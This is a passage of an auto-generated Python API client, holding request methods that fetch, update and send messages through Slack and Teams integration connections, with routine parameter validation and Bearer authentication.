def get_slack_emoji_with_http_info(self, id, **kwargs):  # noqa: E501
    """get_slack_emoji  # noqa: E501

    ### Required permissions * User account permission: `tasks:manage`  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_slack_emoji_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: A unique integer value identifying this Slack connection. (required)
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: tuple(list[SlackEmoji], status_code(int), headers(HTTPHeaderDict))
             If the method is called asynchronously,
             returns the request thread.
    """
    # Snapshot of the call arguments (self, id, kwargs). Must be taken
    # before any other local is bound, or that local would leak into it.
    local_var_params = locals()

    # Whitelist of keyword arguments this endpoint accepts.
    all_params = ['id']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Reject unknown kwargs, then flatten the accepted ones into the
    # captured parameter dict.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_slack_emoji" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'id' is set
    if self.api_client.client_side_validation and ('id' not in local_var_params or  # noqa: E501
                                                   local_var_params['id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `id` when calling `get_slack_emoji`")  # noqa: E501

    collection_formats = {}

    # Substituted into the `{id}` placeholder of the resource path.
    path_params = {}
    if 'id' in local_var_params:
        path_params['id'] = local_var_params['id']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    # GET carries no request body.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501

    return self.api_client.call_api(
        '/api/2/integrations/slack/{id}/emoji', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='list[SlackEmoji]',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_slack_users(self, id, **kwargs):  # noqa: E501
    """get_slack_users  # noqa: E501

    ### Required permissions * User account permission: `tasks:manage`  # noqa: E501
    Synchronous by default; pass async_req=True to execute the request on
    a worker thread and receive the thread object instead.
    >>> thread = api.get_slack_users(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: A unique integer value identifying this Slack connection. (required)
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: list[SlackUser]
             If the method is called asynchronously,
             returns the request thread.
    """
    # Delegate to the *_with_http_info twin, forcing data-only return so
    # callers get the deserialized body rather than a (data, status,
    # headers) tuple.
    forwarded = dict(kwargs, _return_http_data_only=True)
    return self.get_slack_users_with_http_info(id, **forwarded)  # noqa: E501
def get_slack_users_with_http_info(self, id, **kwargs):  # noqa: E501
    """get_slack_users  # noqa: E501

    ### Required permissions * User account permission: `tasks:manage`  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_slack_users_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: A unique integer value identifying this Slack connection. (required)
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: tuple(list[SlackUser], status_code(int), headers(HTTPHeaderDict))
             If the method is called asynchronously,
             returns the request thread.
    """
    # Snapshot of the call arguments (self, id, kwargs). Must be taken
    # before any other local is bound, or that local would leak into it.
    local_var_params = locals()

    # Whitelist of keyword arguments this endpoint accepts.
    all_params = ['id']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Reject unknown kwargs, then flatten the accepted ones into the
    # captured parameter dict.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_slack_users" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'id' is set
    if self.api_client.client_side_validation and ('id' not in local_var_params or  # noqa: E501
                                                   local_var_params['id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `id` when calling `get_slack_users`")  # noqa: E501

    collection_formats = {}

    # Substituted into the `{id}` placeholder of the resource path.
    path_params = {}
    if 'id' in local_var_params:
        path_params['id'] = local_var_params['id']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    # GET carries no request body.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501

    return self.api_client.call_api(
        '/api/2/integrations/slack/{id}/users', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='list[SlackUser]',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_teams_channels(self, id, **kwargs):  # noqa: E501
    """get_teams_channels  # noqa: E501

    ### Required permissions * User account permission: `tasks:manage`  # noqa: E501
    Synchronous by default; pass async_req=True to execute the request on
    a worker thread and receive the thread object instead.
    >>> thread = api.get_teams_channels(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: A unique integer value identifying this Teams connection. (required)
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: list[TeamsRecipient]
             If the method is called asynchronously,
             returns the request thread.
    """
    # Delegate to the *_with_http_info twin, forcing data-only return so
    # callers get the deserialized body rather than a (data, status,
    # headers) tuple.
    forwarded = dict(kwargs, _return_http_data_only=True)
    return self.get_teams_channels_with_http_info(id, **forwarded)  # noqa: E501
def get_teams_channels_with_http_info(self, id, **kwargs):  # noqa: E501
    """get_teams_channels  # noqa: E501

    ### Required permissions * User account permission: `tasks:manage`  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_teams_channels_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: A unique integer value identifying this Teams connection. (required)
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: tuple(list[TeamsRecipient], status_code(int), headers(HTTPHeaderDict))
             If the method is called asynchronously,
             returns the request thread.
    """
    # Snapshot of the call arguments (self, id, kwargs). Must be taken
    # before any other local is bound, or that local would leak into it.
    local_var_params = locals()

    # Whitelist of keyword arguments this endpoint accepts.
    all_params = ['id']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Reject unknown kwargs, then flatten the accepted ones into the
    # captured parameter dict.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_teams_channels" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'id' is set
    if self.api_client.client_side_validation and ('id' not in local_var_params or  # noqa: E501
                                                   local_var_params['id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `id` when calling `get_teams_channels`")  # noqa: E501

    collection_formats = {}

    # Substituted into the `{id}` placeholder of the resource path.
    path_params = {}
    if 'id' in local_var_params:
        path_params['id'] = local_var_params['id']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    # GET carries no request body.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501

    return self.api_client.call_api(
        '/api/2/integrations/teams/{id}/channels', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='list[TeamsRecipient]',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_teams_connection(self, id, **kwargs):  # noqa: E501
    """get_teams_connection  # noqa: E501

    ### Required permissions * User account permission: `None` (read) / `system:admin-access` (write)  # noqa: E501
    Synchronous by default; pass async_req=True to execute the request on
    a worker thread and receive the thread object instead.
    >>> thread = api.get_teams_connection(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: A unique integer value identifying this Teams connection. (required)
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: TeamsConnection
             If the method is called asynchronously,
             returns the request thread.
    """
    # Delegate to the *_with_http_info twin, forcing data-only return so
    # callers get the deserialized body rather than a (data, status,
    # headers) tuple.
    forwarded = dict(kwargs, _return_http_data_only=True)
    return self.get_teams_connection_with_http_info(id, **forwarded)  # noqa: E501
def get_teams_connection_with_http_info(self, id, **kwargs):  # noqa: E501
    """get_teams_connection  # noqa: E501

    Fetch a single Teams connection, returning the full HTTP response
    information (body, status code, headers).

    ### Required permissions * User account permission: `None` (read) / `system:admin-access` (write)

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request:

    >>> thread = api.get_teams_connection_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: A unique integer value identifying this Teams connection. (required)
    :param _return_http_data_only: return the response body without status
                                   code and headers
    :param _preload_content: if False, the raw urllib3.HTTPResponse object is
                             returned without reading/decoding response data.
                             Default is True.
    :param _request_timeout: total request timeout (number) or a
                             (connection, read) tuple of timeouts.
    :return: tuple(TeamsConnection, status_code(int), headers(HTTPHeaderDict))
        If the method is called asynchronously, returns the request thread.
    """
    # Keyword arguments this endpoint accepts.
    accepted = (
        'id',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    )
    params = {'id': id}
    for name in kwargs:
        if name not in accepted:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_teams_connection" % name
            )
        params[name] = kwargs[name]
    # Client-side validation: `id` is required and must not be None.
    if self.api_client.client_side_validation and params.get('id') is None:  # noqa: E501
        raise ApiValueError("Missing the required parameter `id` when calling `get_teams_connection`")  # noqa: E501

    path_params = {'id': params['id']}
    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/api/2/integrations/teams/{id}', 'GET',
        path_params,
        [],    # no query parameters
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='TeamsConnection',  # noqa: E501
        auth_settings=['Bearer'],  # Authentication setting
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_teams_users(self, id, **kwargs):  # noqa: E501
    """get_teams_users  # noqa: E501

    List the users reachable through a Teams connection, returning only
    the deserialized body; delegates to ``get_teams_users_with_http_info``.

    ### Required permissions * User account permission: `tasks:manage`

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request:

    >>> thread = api.get_teams_users(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: A unique integer value identifying this Teams connection. (required)
    :param _preload_content: if False, the raw urllib3.HTTPResponse object is
                             returned without reading/decoding response data.
                             Default is True.
    :param _request_timeout: total request timeout (number) or a
                             (connection, read) tuple of timeouts.
    :return: list[TeamsRecipient]
        If the method is called asynchronously, returns the request thread.
    """
    # Force body-only return; the *_with_http_info variant does the work.
    opts = dict(kwargs, _return_http_data_only=True)
    return self.get_teams_users_with_http_info(id, **opts)  # noqa: E501
def get_teams_users_with_http_info(self, id, **kwargs):  # noqa: E501
    """get_teams_users  # noqa: E501

    List the users reachable through a Teams connection, returning the
    full HTTP response information (body, status code, headers).

    ### Required permissions * User account permission: `tasks:manage`

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request:

    >>> thread = api.get_teams_users_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: A unique integer value identifying this Teams connection. (required)
    :param _return_http_data_only: return the response body without status
                                   code and headers
    :param _preload_content: if False, the raw urllib3.HTTPResponse object is
                             returned without reading/decoding response data.
                             Default is True.
    :param _request_timeout: total request timeout (number) or a
                             (connection, read) tuple of timeouts.
    :return: tuple(list[TeamsRecipient], status_code(int), headers(HTTPHeaderDict))
        If the method is called asynchronously, returns the request thread.
    """
    # Keyword arguments this endpoint accepts.
    accepted = (
        'id',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    )
    params = {'id': id}
    for name in kwargs:
        if name not in accepted:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_teams_users" % name
            )
        params[name] = kwargs[name]
    # Client-side validation: `id` is required and must not be None.
    if self.api_client.client_side_validation and params.get('id') is None:  # noqa: E501
        raise ApiValueError("Missing the required parameter `id` when calling `get_teams_users`")  # noqa: E501

    path_params = {'id': params['id']}
    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/api/2/integrations/teams/{id}/users', 'GET',
        path_params,
        [],    # no query parameters
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='list[TeamsRecipient]',  # noqa: E501
        auth_settings=['Bearer'],  # Authentication setting
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def patch_slack_connection(self, id, slack_connection_partial_update, **kwargs):  # noqa: E501
    """patch_slack_connection  # noqa: E501

    Partially update a Slack connection and return only the deserialized
    body; delegates to ``patch_slack_connection_with_http_info``.

    ### Required permissions * User account permission: `None` (read) / `system:admin-access` (write)

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request:

    >>> thread = api.patch_slack_connection(id, slack_connection_partial_update, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: A unique integer value identifying this Slack connection. (required)
    :param SlackConnectionPartialUpdate slack_connection_partial_update: (required)
    :param _preload_content: if False, the raw urllib3.HTTPResponse object is
                             returned without reading/decoding response data.
                             Default is True.
    :param _request_timeout: total request timeout (number) or a
                             (connection, read) tuple of timeouts.
    :return: SlackConnection
        If the method is called asynchronously, returns the request thread.
    """
    # Force body-only return; the *_with_http_info variant does the work.
    opts = dict(kwargs, _return_http_data_only=True)
    return self.patch_slack_connection_with_http_info(id, slack_connection_partial_update, **opts)  # noqa: E501
def patch_slack_connection_with_http_info(self, id, slack_connection_partial_update, **kwargs):  # noqa: E501
    """patch_slack_connection  # noqa: E501

    Partially update a Slack connection, returning the full HTTP response
    information (body, status code, headers).

    ### Required permissions * User account permission: `None` (read) / `system:admin-access` (write)

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request:

    >>> thread = api.patch_slack_connection_with_http_info(id, slack_connection_partial_update, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: A unique integer value identifying this Slack connection. (required)
    :param SlackConnectionPartialUpdate slack_connection_partial_update: (required)
    :param _return_http_data_only: return the response body without status
                                   code and headers
    :param _preload_content: if False, the raw urllib3.HTTPResponse object is
                             returned without reading/decoding response data.
                             Default is True.
    :param _request_timeout: total request timeout (number) or a
                             (connection, read) tuple of timeouts.
    :return: tuple(SlackConnection, status_code(int), headers(HTTPHeaderDict))
        If the method is called asynchronously, returns the request thread.
    """
    # Keyword arguments this endpoint accepts.
    accepted = (
        'id',
        'slack_connection_partial_update',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    )
    params = {
        'id': id,
        'slack_connection_partial_update': slack_connection_partial_update,
    }
    for name in kwargs:
        if name not in accepted:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method patch_slack_connection" % name
            )
        params[name] = kwargs[name]
    # Client-side validation: both parameters are required and non-None.
    if self.api_client.client_side_validation and params.get('id') is None:  # noqa: E501
        raise ApiValueError("Missing the required parameter `id` when calling `patch_slack_connection`")  # noqa: E501
    if self.api_client.client_side_validation and params.get('slack_connection_partial_update') is None:  # noqa: E501
        raise ApiValueError("Missing the required parameter `slack_connection_partial_update` when calling `patch_slack_connection`")  # noqa: E501

    path_params = {'id': params['id']}
    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        # HTTP header `Content-Type`
        'Content-Type': self.api_client.select_header_content_type(  # noqa: E501
            ['application/json']),  # noqa: E501
    }
    # The partial-update object is sent as the request body.
    body_params = params['slack_connection_partial_update']

    return self.api_client.call_api(
        '/api/2/integrations/slack/{id}', 'PATCH',
        path_params,
        [],    # no query parameters
        header_params,
        body=body_params,
        post_params=[],
        files={},
        response_type='SlackConnection',  # noqa: E501
        auth_settings=['Bearer'],  # Authentication setting
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def patch_teams_connection(self, id, teams_connection_partial_update, **kwargs):  # noqa: E501
    """patch_teams_connection  # noqa: E501

    Partially update a Teams connection and return only the deserialized
    body; delegates to ``patch_teams_connection_with_http_info``.

    ### Required permissions * User account permission: `None` (read) / `system:admin-access` (write)

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request:

    >>> thread = api.patch_teams_connection(id, teams_connection_partial_update, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: A unique integer value identifying this Teams connection. (required)
    :param TeamsConnectionPartialUpdate teams_connection_partial_update: (required)
    :param _preload_content: if False, the raw urllib3.HTTPResponse object is
                             returned without reading/decoding response data.
                             Default is True.
    :param _request_timeout: total request timeout (number) or a
                             (connection, read) tuple of timeouts.
    :return: TeamsConnection
        If the method is called asynchronously, returns the request thread.
    """
    # Force body-only return; the *_with_http_info variant does the work.
    opts = dict(kwargs, _return_http_data_only=True)
    return self.patch_teams_connection_with_http_info(id, teams_connection_partial_update, **opts)  # noqa: E501
def patch_teams_connection_with_http_info(self, id, teams_connection_partial_update, **kwargs):  # noqa: E501
    """patch_teams_connection  # noqa: E501

    Partially update a Teams connection, returning the full HTTP response
    information (body, status code, headers).

    ### Required permissions * User account permission: `None` (read) / `system:admin-access` (write)

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request:

    >>> thread = api.patch_teams_connection_with_http_info(id, teams_connection_partial_update, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: A unique integer value identifying this Teams connection. (required)
    :param TeamsConnectionPartialUpdate teams_connection_partial_update: (required)
    :param _return_http_data_only: return the response body without status
                                   code and headers
    :param _preload_content: if False, the raw urllib3.HTTPResponse object is
                             returned without reading/decoding response data.
                             Default is True.
    :param _request_timeout: total request timeout (number) or a
                             (connection, read) tuple of timeouts.
    :return: tuple(TeamsConnection, status_code(int), headers(HTTPHeaderDict))
        If the method is called asynchronously, returns the request thread.
    """
    # Keyword arguments this endpoint accepts.
    accepted = (
        'id',
        'teams_connection_partial_update',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    )
    params = {
        'id': id,
        'teams_connection_partial_update': teams_connection_partial_update,
    }
    for name in kwargs:
        if name not in accepted:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method patch_teams_connection" % name
            )
        params[name] = kwargs[name]
    # Client-side validation: both parameters are required and non-None.
    if self.api_client.client_side_validation and params.get('id') is None:  # noqa: E501
        raise ApiValueError("Missing the required parameter `id` when calling `patch_teams_connection`")  # noqa: E501
    if self.api_client.client_side_validation and params.get('teams_connection_partial_update') is None:  # noqa: E501
        raise ApiValueError("Missing the required parameter `teams_connection_partial_update` when calling `patch_teams_connection`")  # noqa: E501

    path_params = {'id': params['id']}
    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        # HTTP header `Content-Type`
        'Content-Type': self.api_client.select_header_content_type(  # noqa: E501
            ['application/json']),  # noqa: E501
    }
    # The partial-update object is sent as the request body.
    body_params = params['teams_connection_partial_update']

    return self.api_client.call_api(
        '/api/2/integrations/teams/{id}', 'PATCH',
        path_params,
        [],    # no query parameters
        header_params,
        body=body_params,
        post_params=[],
        files={},
        response_type='TeamsConnection',  # noqa: E501
        auth_settings=['Bearer'],  # Authentication setting
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def send_slack_message(self, id, slack_message, **kwargs):  # noqa: E501
    """send_slack_message  # noqa: E501

    Post a message through a Slack connection; delegates to
    ``send_slack_message_with_http_info``.

    ### Required permissions * User account permission: `tasks:manage`

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request:

    >>> thread = api.send_slack_message(id, slack_message, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: A unique integer value identifying this Slack connection. (required)
    :param SlackMessage slack_message: (required)
    :param _preload_content: if False, the raw urllib3.HTTPResponse object is
                             returned without reading/decoding response data.
                             Default is True.
    :param _request_timeout: total request timeout (number) or a
                             (connection, read) tuple of timeouts.
    :return: None
        If the method is called asynchronously, returns the request thread.
    """
    # Force body-only return; the *_with_http_info variant does the work.
    opts = dict(kwargs, _return_http_data_only=True)
    return self.send_slack_message_with_http_info(id, slack_message, **opts)  # noqa: E501
def send_slack_message_with_http_info(self, id, slack_message, **kwargs):  # noqa: E501
    """send_slack_message  # noqa: E501

    Post a message through a Slack connection, returning the full HTTP
    response information (status code, headers; no body is deserialized).

    ### Required permissions * User account permission: `tasks:manage`

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request:

    >>> thread = api.send_slack_message_with_http_info(id, slack_message, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: A unique integer value identifying this Slack connection. (required)
    :param SlackMessage slack_message: (required)
    :param _return_http_data_only: return the response body without status
                                   code and headers
    :param _preload_content: if False, the raw urllib3.HTTPResponse object is
                             returned without reading/decoding response data.
                             Default is True.
    :param _request_timeout: total request timeout (number) or a
                             (connection, read) tuple of timeouts.
    :return: None
        If the method is called asynchronously, returns the request thread.
    """
    # Keyword arguments this endpoint accepts.
    accepted = (
        'id',
        'slack_message',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    )
    params = {'id': id, 'slack_message': slack_message}
    for name in kwargs:
        if name not in accepted:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method send_slack_message" % name
            )
        params[name] = kwargs[name]
    # Client-side validation: both parameters are required and non-None.
    if self.api_client.client_side_validation and params.get('id') is None:  # noqa: E501
        raise ApiValueError("Missing the required parameter `id` when calling `send_slack_message`")  # noqa: E501
    if self.api_client.client_side_validation and params.get('slack_message') is None:  # noqa: E501
        raise ApiValueError("Missing the required parameter `slack_message` when calling `send_slack_message`")  # noqa: E501

    path_params = {'id': params['id']}
    # Only Content-Type is set; the endpoint returns no decodable body,
    # so no Accept header is sent (matches the API spec for this route).
    header_params = {
        # HTTP header `Content-Type`
        'Content-Type': self.api_client.select_header_content_type(  # noqa: E501
            ['application/json']),  # noqa: E501
    }
    # The message object is sent as the request body.
    body_params = params['slack_message']

    return self.api_client.call_api(
        '/api/2/integrations/slack/{id}/message', 'POST',
        path_params,
        [],    # no query parameters
        header_params,
        body=body_params,
        post_params=[],
        files={},
        response_type=None,  # noqa: E501
        auth_settings=['Bearer'],  # Authentication setting
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def send_teams_message(self, id, teams_message, **kwargs):  # noqa: E501
    """send_teams_message  # noqa: E501

    Post a message through a Teams connection; delegates to
    ``send_teams_message_with_http_info``.

    ### Required permissions * User account permission: `tasks:manage`

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request:

    >>> thread = api.send_teams_message(id, teams_message, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: A unique integer value identifying this Teams connection. (required)
    :param TeamsMessage teams_message: (required)
    :param _preload_content: if False, the raw urllib3.HTTPResponse object is
                             returned without reading/decoding response data.
                             Default is True.
    :param _request_timeout: total request timeout (number) or a
                             (connection, read) tuple of timeouts.
    :return: None
        If the method is called asynchronously, returns the request thread.
    """
    # Force body-only return; the *_with_http_info variant does the work.
    opts = dict(kwargs, _return_http_data_only=True)
    return self.send_teams_message_with_http_info(id, teams_message, **opts)  # noqa: E501
def send_teams_message_with_http_info(self, id, teams_message, **kwargs):  # noqa: E501
    """send_teams_message  # noqa: E501

    Post a message through a Teams connection, returning the full HTTP
    response information (status code, headers; no body is deserialized).

    ### Required permissions * User account permission: `tasks:manage`

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request:

    >>> thread = api.send_teams_message_with_http_info(id, teams_message, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: A unique integer value identifying this Teams connection. (required)
    :param TeamsMessage teams_message: (required)
    :param _return_http_data_only: return the response body without status
                                   code and headers
    :param _preload_content: if False, the raw urllib3.HTTPResponse object is
                             returned without reading/decoding response data.
                             Default is True.
    :param _request_timeout: total request timeout (number) or a
                             (connection, read) tuple of timeouts.
    :return: None
        If the method is called asynchronously, returns the request thread.
    """
    # Keyword arguments this endpoint accepts.
    accepted = (
        'id',
        'teams_message',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    )
    params = {'id': id, 'teams_message': teams_message}
    for name in kwargs:
        if name not in accepted:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method send_teams_message" % name
            )
        params[name] = kwargs[name]
    # Client-side validation: both parameters are required and non-None.
    if self.api_client.client_side_validation and params.get('id') is None:  # noqa: E501
        raise ApiValueError("Missing the required parameter `id` when calling `send_teams_message`")  # noqa: E501
    if self.api_client.client_side_validation and params.get('teams_message') is None:  # noqa: E501
        raise ApiValueError("Missing the required parameter `teams_message` when calling `send_teams_message`")  # noqa: E501

    path_params = {'id': params['id']}
    # Only Content-Type is set; the endpoint returns no decodable body,
    # so no Accept header is sent (matches the API spec for this route).
    header_params = {
        # HTTP header `Content-Type`
        'Content-Type': self.api_client.select_header_content_type(  # noqa: E501
            ['application/json']),  # noqa: E501
    }
    # The message object is sent as the request body.
    body_params = params['teams_message']

    return self.api_client.call_api(
        '/api/2/integrations/teams/{id}/send-message', 'POST',
        path_params,
        [],    # no query parameters
        header_params,
        body=body_params,
        post_params=[],
        files={},
        response_type=None,  # noqa: E501
        auth_settings=['Bearer'],  # Authentication setting
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def start_slack_connection_flow(self, **kwargs):  # noqa: E501
    """start_slack_connection_flow  # noqa: E501

    Begin the Slack OAuth connection flow; delegates to
    ``start_slack_connection_flow_with_http_info``.

    ### Required permissions * User account permission: `system:admin-access`

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request:

    >>> thread = api.start_slack_connection_flow(async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str ordering: Which field to use when ordering the results.
    :param int limit: Number of results to return per page.
    :param int offset: The initial index from which to return the results.
    :param _preload_content: if False, the raw urllib3.HTTPResponse object is
                             returned without reading/decoding response data.
                             Default is True.
    :param _request_timeout: total request timeout (number) or a
                             (connection, read) tuple of timeouts.
    :return: None
        If the method is called asynchronously, returns the request thread.
    """
    # Force body-only return; the *_with_http_info variant does the work.
